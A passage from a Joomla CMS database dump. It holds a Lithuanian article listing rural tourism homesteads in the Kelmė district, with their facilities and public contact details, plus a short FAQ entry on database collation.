00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/dviraciai2014.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,0,164,'','',1,3862,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(194,281,'Kaimo turizmas','kaimo-turizmas','','<table cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-right: 15px;\" align=\"left\" valign=\"top\">\r\n<p>{gallery cols=4 orientation=vertical width=166}stories/kaimo_turizmas/miego_klinika/{/gallery}</p>\r\n</td>\r\n<td align=\"left\" valign=\"top\">\r\n<h2 class=\"attribute-header-line\">Kaimo turizmo sodyba „Miego klinika“</h2>\r\n<div class=\"attribute-short\">\r\n<p class=\"pjusttify\"><span>„Miego klinika“ įsikūrusi Kelmės rajone, Raudsparnės kaime esančiame Kurtuvėnų regioniniame parke. Kaimo turizmo sodybos kompleksą sudaro keturios pokylių salės. </span></p>\r\n<p class=\"pjusttify\"><span>Didžiojoje – „Meilės salėje“ telpa per 60 svečių, o nedidukėje – „Pelėdos buveinėje“ iki 30 svečių. Sodyba tinkama ir šeimos šventėms: vestuvėms, krikštynoms, jubiliejams, ir pažymėti valstybines šventes ar sutikti Naujuosius. Prie pokylių salių įrengtos ir virtuvėlės.</span></p>\r\n<p class=\"pjusttify\">Švenčiantiems vestuves siūlome atskirus kaimiško pobūdžio apartamentus, kuriuose rasite dvigulę lovą, sofą, kušetę, televizorių ir jaukumo suteikiantį židinį.</p>\r\n<p class=\"pjusttify\">Galime Jums pasiūlyti kubilą ir 3 tradicines rusiškas garo pirtis: „Velnio“, „Raganos“, „Piratų“. Svečių patogumui virš pirtelių įrengtos miegamos vietos. Visi nameliai ir pirtelės yra atokiai viena nuo kitos.</p>\r\n<p><strong>Adresas:</strong></p>\r\n<ul>\r\n<li>Raudsparnės k., Kelmės r.</li>\r\n<li>Mob. 8 612 22 203</li>\r\n<li>El. paštas <a href=\"mailto:info@miegoklinika.lt\" target=\"_self\">info@miegoklinika.lt</a></li>\r\n<li>Interneto svetainė <a href=\"http://www.miegoklinika.lt/\" target=\"_blank\">www.miegoklinika.lt</a> </li>\r\n</ul>\r\n<div><span style=\"color: #000000;\"> </span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<div class=\"content-view-line\">\r\n<div class=\"class-article float-break\">\r\n<table cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-right: 15px; width: 200px;\" align=\"left\" valign=\"top\">\r\n<p>{gallery cols=5 orientation=vertical width=166}stories/kaimo_turizmas/5_sezonas/{/gallery}</p>\r\n</td>\r\n<td align=\"left\" valign=\"top\">\r\n<h2 class=\"attribute-header-line\">Kaimo turizmo sodyba „5 sezonas“</h2>\r\n<div class=\"attribute-short\">\r\n<p class=\"pjusttify\">Moderni kaimo turizmo sodyba ribojasi su Dubysos upe. Labai graži, vaizdinga vietovė, atsiveria visa Padubysio erdvė. Nameliai išdėstyti kalne, tai suteikia dar didesnį erdvės pojūtį.</p>\r\n<p class=\"pjusttify\">Šiltuoju sezonu ant pagrindinio namo stogo įrengiama įspūdingo dydžio lauko terasa. Visa teritorija apšviesta, takeliai ir automobilių stovėjimo aikštelė iškloti trinkelėmis.</p>\r\n<p class=\"pjusttify\">Poilsio kompleksą sudaro pagrindinis namas bei trys atskiri šeimyniniam poilsiui pritaikyti nameliai. Pagrindiniame name yra konferencijų ir pokylių salė su reikalinga įranga, penki poilsiui pritaikyti numeriai su mažomis virtuvėmis ir kiekvienam kambariui skirtu WC ir dušu.</p>\r\n<p class=\"pjusttify\">Rūsyje – turkiška pirtis, baseinas su masažine srove; biliardo stalas. Kiekvienas kambarys turi atskirą terasą su lauko baldais.<br /> <br /><strong>Adresas:</strong></p>\r\n<ul>\r\n<li>Rėžalių k., Tytuvėnų apylinkių seniūnija, Kelmės rajonas</li>\r\n<li>Mob. 8 611 16 797</li>\r\n<li>El. paštas <a href=\"mailto:info@5sezonas.lt\" target=\"_self\">info@5sezonas.lt</a></li>\r\n<li>Interneto svetainė <a href=\"http://www.5sezonas.lt/\" target=\"_blank\">www.5sezonas.lt</a> </li>\r\n</ul>\r\n<div><span style=\"color: #000000;\"> </span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n<div class=\"content-view-line\">\r\n<div class=\"class-article float-break\">\r\n<table cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-right: 15px; width: 200px;\" align=\"left\" valign=\"top\">\r\n<p>{gallery cols=4 orientation=vertical width=166}stories/kaimo_turizmas/azuolu_slenis/{/gallery}</p>\r\n</td>\r\n<td align=\"left\" valign=\"top\">\r\n<h2 class=\"attribute-header-line\">Kaimo turizmo sodyba „Ąžuolų slėnis“</h2>\r\n<div class=\"attribute-short\">\r\n<p class=\"pjusttify\">Sodyba įsikūrusi buvusio dvaro teritorijoje – vienkiemyje, prie legendomis apipinto Kibirkštuko ežero. <br />Kviečiame paviešėti kolektyvus, šeimas, moksleivių grupes.</p>\r\n<p class=\"pjusttify\">Siūlome ne tik pasigrožėti nuostabia gamta, karūnuotaisiais danieliais, nepakartojamų ilgakojų stručių šokiu, bet ir organizuoti įvairias šventes, susitikimus, seminarus, konferencijas. <br /> <br />Besidomintiems tautos praeitimi sudarysime galimybę dalyvauti pažintinėje ekskursijoje po vietos apylinkes, papasakosime apie senąją dvarvietę, kur dabar auginami Afrikos stručiai.<br /> <br />Norintiems ilgiau paviešėti siūlome 2–4 vietų kambarius, baseiną, pirtį, sūkurinę vonią, žaidimų aikšteles.</p>\r\n<p class=\"pjusttify\">Ieškantieji romantikos galės įsikurti stovyklavietėje ar namelyje ant ratų.<br /> <br /><strong>Adresas:</strong></p>\r\n<ul>\r\n<li>Targauskių k., Kukečių sen., Kelmės r.</li>\r\n<li>Mob.: 8 687 32 737, 8 655 69 720</li>\r\n<li>El. paštas <span>azuolu.slenis@gmail.com</span></li>\r\n<li>Interneto svetainė <a href=\"http://www.azuoluslenis.eu\">www.azuoluslenis.eu </a></li>\r\n</ul>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n<div class=\"content-view-line\">\r\n<div class=\"class-article float-break\">\r\n<table cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-right: 15px; width: 200px;\" align=\"left\" valign=\"top\">\r\n<p>{gallery cols=5 orientation=vertical width=166}stories/kaimo_turizmas/misko_vingis/{/gallery}</p>\r\n</td>\r\n<td align=\"left\" valign=\"top\">\r\n<h2 class=\"attribute-header-line\">Kaimo turizmo sodyba „Miško vingis“</h2>\r\n<div class=\"attribute-short\">\r\n<p class=\"pjusttify\">Nepakartojamas Dubysos regioninio parko grožis, tyras kaip krištolas upės ir sodybos tvenkinių vandens gaivumas, aplinkinių laukų platumos, tolimo miško ošimas, gyvenimo sąlygų komfortas leis pamiršti kasdienius rūpesčius, atgauti jėgas, atgaivinti sielą.<br /> <br />Sodyboje poilsiautojai laukiami visus metus. Čia ideali vieta rengti seminarus, darbuotojų mokymus su modernia įranga.</p>\r\n<p class=\"pjusttify\">Yra pokylių salė su židiniu, kurioje gali patogiai jaustis apie 60 žmonių, ir kambariai saldžiam ir ramiam miegui. Kaimiška pirtis ir erdvi šokių salė.<br /> <br />Sodyba yra kelyje Kelmė–Tytuvėnai, prieš ženklą Bulavėnai (3 km nuo pagrindinio kelio).</p>\r\n<p><strong>Adresas:</strong></p>\r\n<ul>\r\n<li>Tytuvėnų apylinkių seniūnija, Kelmės r.</li>\r\n<li>Mob. 8 614 75 086</li>\r\n<li>El. paštas augusta@mail.lt</li>\r\n<li>Interneto svetainė <a href=\"http://www.miskovingis.lt/%20\">http://www.miskovingis.lt/ </a></li>\r\n</ul>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n<div class=\"content-view-line\">\r\n<div class=\"class-article float-break\">\r\n<table cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-right: 15px; width: 200px;\" align=\"left\" valign=\"top\">\r\n<p>{gallery cols=5 orientation=vertical width=166}stories/kaimo_turizmas/liepyne/{/gallery}</p>\r\n</td>\r\n<td align=\"left\" valign=\"top\">\r\n<h2 class=\"attribute-header-line\">Kaimo turizmo sodyba „Liepynė“</h2>\r\n<div class=\"attribute-short\">\r\n<p class=\"pjusttify\">Sodyba įsikūrusi unikaliame gamtos kampelyje, ją supantys miškai ir laukai garantuoja gamtos ramybę, oro gaivumą, sielos ramumą.</p>\r\n<p class=\"pjusttify\">Jums siūloma unikali pirtis, įrengta tvenkinio viduryje plaukiojančiame laive, vėlyvais vakarais pasišildyti jaukioje pavėsinėje su neįprastu židiniu.</p>\r\n<p class=\"pjusttify\">Pobūviams ir vakarėliams turime puikią salę. Mūsų sodyba – Jūsų gera nuotaika.</p>\r\n<p><strong>Adresas:</strong></p>\r\n<ul>\r\n<li>Kuzokų k., Liolių sen., Kelmės r.</li>\r\n<li>Mob. 8 614 90 097</li>\r\n<li>El. paštas <a href=\"mailto:ekokuras@gmail.com\" target=\"_self\">ekokuras@gmail.com</a> </li>\r\n</ul>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n<div class=\"content-view-line\">\r\n<div class=\"class-article float-break\">\r\n<table cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-right: 15px; width: 200px;\" align=\"left\" valign=\"top\">\r\n<p>{gallery cols=5 orientation=vertical width=166}stories/kaimo_turizmas/gaja/{/gallery}</p>\r\n</td>\r\n<td align=\"left\" valign=\"top\">\r\n<h2 class=\"attribute-header-line\">Kaimo turizmo sodyba „Gaja“</h2>\r\n<div class=\"attribute-short\">\r\n<p><span>Kaimo turizmo sodyba „Gaja“ įsikūrusi Dubysos slėnyje, ypač vaizdingame kraštovaizdyje, tarp trijų regioninių parkų – Kurtuvėnų regioninio parko, Tytuvėnų regioninio parko, Dubysos regioninio parko, įvairių draustinių ir kitų lankytinų gamtos, archeologijos, paveldo objektų.</span></p>\r\n<p>Sodyboje svečiai apgyvendinami jaukiuose dviviečiuose, triviečiuose, keturviečiuose kambariuose ir šeimyniniuose numeriuose su visais patogumais. Pro langus atsiveria nepakartojama Dubysos slėnio panorama, aukšti šlaitai, upės vingis, ošiantis pušynas.</p>\r\n<p>Sodyboje „Gaja“ svečių laukia jaukios poilsiavietės ant Dubysos kranto. Keliaujantiems baidarėmis suteikiama nemokama stovyklavietė: erdvi pavėsinė, automobilių stovėjimo aikštelė, žaidimo aikštelės, WC. Kaimo turizmo sodyba „Gaja“ Jums siūlo naują, modernų, saugų ir patogų inventorių, skirtą kelionėms baidarėmis. Jūs keliausite naujomis baidarėmis „Vista“ ir „Dag Freeland“. Sodybos svečiai aktyvų laisvalaikį gali leisti krepšinio, tinklinio aikštelėje.</p>\r\n<table class=\"renderedtable\" style=\"width: 100%;\" border=\"0\" cellspacing=\"0\" cellpadding=\"2\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" width=\"45%\">\r\n<p><strong>Adresas:</strong></p>\r\n<ul>\r\n<li>Pabariukų k., Tytuvėnų sen., Kelmės r.</li>\r\n<li>Tel. 8 611 99 616</li>\r\n<li>El. paštas info@sodybagaja.lt</li>\r\n<li>Interneto svetainė <a href=\"http://www.sodybagaja.lt\">www.sodybagaja.lt</a></li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n<div class=\"content-view-line\">\r\n<div class=\"class-article float-break\">\r\n<table cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-right: 15px; width: 200px;\" align=\"left\" valign=\"top\">\r\n<p>{gallery cols=5 orientation=vertical width=166}stories/kaimo_turizmas/prienu_vienkiemis/{/gallery}</p>\r\n</td>\r\n<td align=\"left\" valign=\"top\">\r\n<h2 class=\"attribute-header-line\">Kaimo turizmo sodyba „Prienų vienkiemis“</h2>\r\n<div class=\"attribute-short\">\r\n<p class=\"pjusttify\">Sodyba neįprastu pavadinimu suintriguoja daugelį poilsiautojų. Čia gali ilsėtis norintieji pasimėgauti ramybe, nuostabia gamta.</p>\r\n<p class=\"pjusttify\">Pokylių salė puošta etnokultūros elementais. Sodybai teikia šilumą jos stilius, malonūs šeimininkai ir aplinką supantys medžiai.</p>\r\n<p><strong>Adresas:</strong></p>\r\n<ul>\r\n<li>Laugalio k., Kelmės r.</li>\r\n<li>Mob. 8 612 51 459</li>\r\n<li>El. paštas <a href=\"mailto:janina@prienuvienkiemis.lt\">janina@prienuvienkiemis.lt</a></li>\r\n<li>Interneto svetainė: <a href=\"http://www.prienuvienkiemis.lt/\">http://www.prienuvienkiemis.lt/</a></li>\r\n</ul>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n<div class=\"content-view-line\">\r\n<div class=\"class-article float-break\">\r\n<table cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-right: 15px; width: 200px;\" align=\"left\" valign=\"top\">\r\n<p>{gallery cols=5 orientation=vertical width=166}stories/kaimo_turizmas/akmenuke/{/gallery}</p>\r\n</td>\r\n<td align=\"left\" valign=\"top\">\r\n<h2 class=\"attribute-header-line\">Kaimo turizmo sodyba „Akmenukė“</h2>\r\n<div class=\"attribute-short\">\r\n<p class=\"pjusttify\">Nuomojama sodyba. Nuo Šiaulių važiuodami senuoju keliu Kelmės link rasite rojaus kampelį, kurį kelių kilometrų spinduliu supa Bijotės, Pagėluvio, Dūkšto ežerai, kiti vandens telkiniai, miškai. Labai geras privažiavimas, 1 km nuo senojo Kelmės plento.</p>\r\n<p class=\"pjusttify\">Moderni ir erdvi 100 m² pokylių salė, židinys, muzika, koncertiniai šviesos efektai, gera garso akustika. Karštą vasarą atvėsins ventiliatoriai, yra šviestuvai, prie salės yra lauko terasa, erdvi virtuvė su visa įranga. Atskirame pastate yra miegamieji. 0,7 ha kiemas su gėlynais ir gėlinėmis, lauko židiniai, pirtis, tvenkinys, kuriame malonu atsigaivinti po pirties.</p>\r\n<table class=\"renderedtable\" style=\"width: 100%;\" border=\"0\" cellspacing=\"0\" cellpadding=\"2\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" width=\"45%\">\r\n<p><strong>Adresas:</strong></p>\r\n<ul>\r\n<li>Kumpiškės kaimas, Kukečių seniūnija, Kelmės r.</li>\r\n<li>Mob.: 8 685 60136, 8 656 50283</li>\r\n<li>El. paštas akmenuke1@gmail.com</li>\r\n<li>Interneto svetainė <a href=\"http://www.akmenuke.puslapiai.lt/\" target=\"_self\">www.akmenuke.puslapiai.lt</a></li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n<div class=\"content-view-line\">\r\n<div class=\"class-article float-break\">\r\n<table cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-right: 15px; width: 200px;\" align=\"left\" valign=\"top\">\r\n<p>{gallery cols=5 orientation=vertical width=166}stories/kaimo_turizmas/draugu_slenis/{/gallery}</p>\r\n</td>\r\n<td align=\"left\" valign=\"top\">\r\n<h2 class=\"attribute-header-line\">Kaimo turizmo sodyba „Draugų slėnis“ </h2>\r\n<div class=\"attribute-short\">\r\n<p>Poilsis gamtoje, žvejyba, vaikų žaidimų aikštelės. Pavaišinsime įvairių žolelių arbata. Jūsų lauki jauki pokylių salė su miegamaisiais, kaimiška pirtis.</p>\r\n<p><strong>Adresas:</strong></p>\r\n<ul>\r\n<li>Paverpenio kaimas, Kukečių seniūnija, Kelmės r.</li>\r\n<li>Mob. 8 694 27 836 </li>\r\n</ul>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n<table cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-right: 15px; width: 200px;\" align=\"left\" valign=\"top\">\r\n<p>{gallery cols=5 orientation=vertical width=166}stories/kaimo_turizmas/medincius/{/gallery}</p>\r\n</td>\r\n<td align=\"left\" valign=\"top\">\r\n<h2 class=\"attribute-header-line\">Kaimo turizmo sodyba  „Medinčius“</h2>\r\n<div class=\"attribute-short\">\r\n<p>Medinčiumi seniau žmonės vadindavo eigulį. Jo pareiga – globoti ir saugoti mišką.<br /> „Medinčiaus“ sodyba – ne tik visai greta miško, bet ir įrengta su pagarba medžiui – ekologiški rąstiniai statiniai – be lako, be chemijos.</p>\r\n<p>Rąstai ištepti specialiu aliejumi, o durys trintos vašku.<br /> Tiesa, vanduo sodyboje – iš 140 metrų gylio gręžinio, todėl vanduo – ypač švarus.<br />Sodybos kompleksas – tai pokylių salės, pirtis ir kubilai (šalto bei karšto vandens).</p>\r\n<table class=\"renderedtable\" style=\"width: 100%;\" border=\"0\" cellspacing=\"0\" cellpadding=\"2\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\">\r\n<p><strong>Adresas:</strong></p>\r\n<ul>\r\n<li>Kalniškių kaimas, Kelmės r.</li>\r\n<li>Mob. 8 618 177 97</li>\r\n<li>El. p. <a href=\"mailto:svacys@gmail.com\" target=\"_self\">svacys@gmail.com</a></li>\r\n<li>Interneto svetainė <a href=\"http://www.medincius.lt/\" target=\"_self\">http://www.medincius.lt</a></li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding-right: 15px;\" align=\"left\" valign=\"top\">\r\n<p>{gallery cols=5 orientation=vertical width=166}stories/kaimo_turizmas/gitanos_sodyba/{/gallery}</p>\r\n</td>\r\n<td align=\"left\" valign=\"top\">\r\n<h2 class=\"attribute-header-line\">Kaimo turizmo sodyba  „Gitanos sodyba“</h2>\r\n<p><span>Kurtuvėnų regioniniame parke apsupta nepakartojamo grožio gamtos, netoli gilaus Šonelio ežero, kur auga didžiuliai juodalksniai, o vasarą dangų remiančiame berže čiulba gal tūkstantis paukščių, stovi sodyba, kurioje yra: pavėsinė, krepšinio aikštelė, vila su šešiais erdviais miegamaisiais, didžiule pokylių sale, virtuve. </span></p>\r\n<p><span>Atskiras pirties pastatas su poilsio kambariu, tvenkinys, japoniška pirtis (kubilas).</span></p>\r\n<p> Čia galima ne tik pailsėti su draugais, pasikaitinti pirtyje, bet ir surengti pokylį, prezentaciją, ar konferenciją.</p>\r\n<p><strong>Adresas:</strong></p>\r\n<ul>\r\n<li>Jadvygavos kaimas, Kelmės r.</li>\r\n<li>Mob. <span>8 698 41169</span></li>\r\n<li>El. paštas <a href=\"mailto:nta@anara.lt\">nta@anara.lt</a></li>\r\n<li>Interneto svetainė <a href=\"http://www.gitanossodyba.lt/\">http://www.gitanossodyba.lt/</a></li>\r\n</ul>\r\n<p> </p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding-right: 15px;\" align=\"left\" valign=\"top\">\r\n<p>{gallery cols=5 orientation=vertical width=166}stories/kaimo_turizmas/marcio_sodyba/{/gallery}</p>\r\n</td>\r\n<td align=\"left\" valign=\"top\">\r\n<h2 class=\"attribute-header-line\">Kaimo turizmo sodyba „Marčio sodyba“</h2>\r\n<p>Kaimo turizmo sodyboje kviečiame pailsėti ramioje aplinkoje, atšvęsti vestuves ir kitas šventes pokylių salėje.</p>\r\n<p><strong>Adresas:</strong></p>\r\n<ul>\r\n<li>Žvilgių kaimas, Kelmės r.</li>\r\n<li>Mob. 8 603 73763</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding-right: 15px;\" align=\"left\" valign=\"top\">\r\n<p>{gallery cols=5 orientation=vertical width=166}stories/kaimo_turizmas/kukuciu_sodyba/{/gallery}</p>\r\n</td>\r\n<td align=\"left\" valign=\"top\">\r\n<h2 class=\"attribute-header-line\">Kaimo turizmo sodyba „Kukučių sodyba“</h2>\r\n<p>Kaimo turizmo sodyboje kviečiame pailsėti ramioje aplinkoje, atšvęsti vestuves ir kitas šventes pokylių salėje Kukečiuose, Kelmės r.</p>\r\n<p><strong>Adresas:</strong></p>\r\n<ul>\r\n<li>Kukečių g. 40, Kukečiai, Kelmės r.</li>\r\n<li>Mob. 8 603 73763 </li>\r\n</ul>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding-right: 15px;\" align=\"left\" valign=\"top\">\r\n<p>{gallery cols=5 orientation=vertical width=166}stories/kaimo_turizmas/prie_upes/{/gallery}</p>\r\n</td>\r\n<td align=\"left\" valign=\"top\">\r\n<h2 class=\"attribute-header-line\">Kaimo turizmo sodyba „Prie upės“</h2>\r\n<div>Sodyba “Prie upės” yra įsikūrusi atokiame ir jaukiame gamtos kampelyje prie Dubysos upės, kur visais metų laikais nepaprastas gamtos grožis garantuos gerą  šventinę nuotaiką! Sodyba “Prie upės” puikiai tiks atšvęsti vestuves, gimtadienius, krikštynas ar tiesiog niekieno netrukdomiems smagiai praleisti laiką draugų būryje.</div>\r\n<div> </div>\r\n<div>\r\n<div>Sodybos “Prie upės” privalumas yra tai, kad Jūs didelėje, aptvertoje sodybos teritorijoje būsite vieni patys be pašalinių žmonių, todėl galėsite džiaugtis savo švente niekieno netrukdomi natūralios gamtos apsuptyje.</div>\r\n<div> </div>\r\n<div>Šiltus vasaros vakarus maloniai praleiskite besišnekučiuodami su bičiuliais laužo šviesoje, tyliai spragsint žarijoms. Specialiai tam sodyboje yra įrengta lauko pavėsinė su židiniu.</div>\r\n<div>Sodyba skirta tiek šeimyniniam poilsiui, tiek įvairioms šventėms bei pokyliams švęsti.</div>\r\n</div>\r\n<p><strong>Adresas:</strong></p>\r\n<ul>\r\n<li><span>Padvarninkų g. 10, Vijurkai, Kelmės raj.</span></li>\r\n<li>Mob. 8 698 <span>84029</span></li>\r\n<li>El. paštas <span>info@sodybaprieupes.lt</span></li>\r\n<li>Interneto svetainė <a href=\"http://www.gitanossodyba.lt/\">http://www.sodybaprieupes.lt/</a></li>\r\n</ul>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding-right: 15px;\" align=\"left\" valign=\"top\">\r\n<p>{gallery cols=5 orientation=vertical width=166}stories/kaimo_turizmas/tytuvenu_papartis/{/gallery}</p>\r\n</td>\r\n<td align=\"left\" valign=\"top\">\r\n<h2 class=\"attribute-header-line\">Kaimo turizmo sodyba „Tytuvėnų papartis“</h2>\r\n<p>Sodyba \" Tytuvėnų papartis \" įsikūrusi Tytuvėnų regioniniame parke ant Giliaus ežero kranto. Šalia sodybos yra Giliaus ežero takas, kuris driekiasi aplink ežerą. einant šiuo taku galėsite aplankyti daugybę įrengtų maudyklų, stebėti paukščius nuo apžvalgos bokštelio, gerti šaltinio vandenį. Šalia sodybos esančiame Giliaus ežere galėsite pasiplaukioti valtimis, baidarėmis bei pažvejoti. Taip pat galėsite pavakaroti prie laužo sodybos kieme</p>\r\n<p>Sodybos banketinėje salėje rengiamos vestuvės, krikštynos, gimtadieniai, giminių susitikimai, sąskrydžiai, konferencijos bei seminarai. Talpinama iki 70 žmonių, taip pat sodyboje galima apnakvyndinti iki 50 svečių. Bendradarbiaujame su partneriais, kurie organizuoja maitinimą ir patalpų dekoravimą. Padedame išsirinkti bei pristatome šventinius tortus. Pasiūlome renginių vedėjus bei muzikantus.</p>\r\n<p><strong>Adresas:</strong></p>\r\n<ul>\r\n<li>Miško g. 9, Tytuvėnai, Kelmės r.</li>\r\n<li>Mob. 8 <span>650 81860</span></li>\r\n<li>El. paštas tytuvenupapartis@gmail.com</li>\r\n<li>Interneto svetainė <a href=\"http://www.tytuvenupapartis.lt/\">http://www.tytuvenupapartis.lt/</a></li>\r\n</ul>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding-right: 15px;\" align=\"left\" valign=\"top\">\r\n<p>{gallery cols=5 orientation=vertical width=166}stories/kaimo_turizmas/raganyne/{/gallery}</p>\r\n</td>\r\n<td align=\"left\" valign=\"top\">\r\n<h2 class=\"attribute-header-line\">„Raganynė“</h2>\r\n<p><span>Jauki, saugi ir puikiai paruošta <span>,,Raganynės sodyba”</span>, 25 km  nuo Kelmės, 42 km  nuo Šiaulių, 33 km nuo Radviliškio, pakeliui į Tytuvėnus ir Raseinius.  </span></p>\r\n<p><span>Jūsu  laukia  jauki  aplinka tiek viduje, tiek aplink sodybą: virtuvėlė, pokylių salė iki 55 žmonių, rusiška pirtis su dviem persirengimo kambariais, dušinė, terasa su baldais; II aukšte 5 kambariai su 40 miegamųjų vietų, 1 kambarys ypatingoms progoms, balkonas, pavėsinė, 1 ha tvenkinys su maudymosi pakrante. </span></p>\r\n<p><span>Sodyba sutvarkyta, privati, uždara; veikia visus metus; visa 14 ha teritorija aptverta ir saugi.</span></p>\r\n<p class=\"pjusttify\"> <strong>Adresas:</strong></p>\r\n<ul>\r\n<li><span>Aukštiškių kaimas 5, Tytuvėnų apl.sen., Kelmės rajonas</span></li>\r\n<li>Mob. 8 <span>614 90851</span></li>\r\n<li>Interneto svetainė <a href=\"http://www.raganyne.lt\">www.raganyne.lt</a></li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',-2,0,0,52,'2014-06-04 16:30:49',135,'','2018-06-12 13:27:02',135,0,'0000-00-00 00:00:00','2014-06-04 16:30:49','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',53,0,9,'','',1,3634,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(165,249,'What is the purpose of the collation selection in the installation screen?','what-is-the-purpose-of-the-collation-selection-in-the-installation-screen','','The collation option determines the way ordering in the database is done. In languages that use special characters, for instance the German umlaut, the database collation determines the sorting order. If you don\'t know which collation you need, select the \"utf8_general_ci\" as most languages use this. The other collations listed are exceptions in regards to the general collation. If your language is not listed in the list of collations it most likely means that \"utf8_general_ci is suitable.','',-2,0,0,52,'2008-08-11 03:11:38',135,'','2008-08-11 03:11:38',135,0,'0000-00-00 00:00:00','2006-10-10 08:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\"}',4,0,0,'','',1,6,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(166,250,'What languages are supported by Joomla! 